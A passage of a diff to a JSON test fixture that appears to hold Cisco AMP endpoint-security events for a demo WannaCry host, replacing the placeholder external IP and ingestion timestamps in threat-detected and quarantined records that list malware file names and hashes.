identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763919Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":461000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.2CA2D550E6-100.SBX.VIOC\",\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskse.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskse.exe\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2124,7 +2124,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2181,7 +2181,7 @@ "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2198,8 +2198,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025265613Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763924600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":430000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.4A468603FD.04426d77.auto.Talos\",\"detection_id\":\"6419303574240493597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"taskdl.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\taskdl.exe\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2221,7 +2221,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2282,7 +2282,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2299,8 +2299,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025267991Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763931100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":327000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2322,7 +2322,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2383,7 +2383,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2400,8 +2400,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025270272Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.763937100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":313000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":2920,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2423,7 +2423,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -2468,7 +2468,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2478,8 +2478,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025272669Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:39.763941700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2499,7 +2499,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2540,7 +2540,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2550,8 +2550,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025274907Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:39.763946600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303574240493594\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2571,7 +2571,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2612,7 +2612,7 @@ "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2622,8 +2622,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025277130Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", + "ingested": "2021-12-09T13:35:39.763952200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526290\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2643,7 +2643,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2684,7 +2684,7 @@ "4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2694,8 +2694,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025279336Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", + "ingested": "2021-12-09T13:35:39.763957400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419303569945526289\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2715,7 +2715,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2756,7 +2756,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2766,8 +2766,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025281853Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Threat 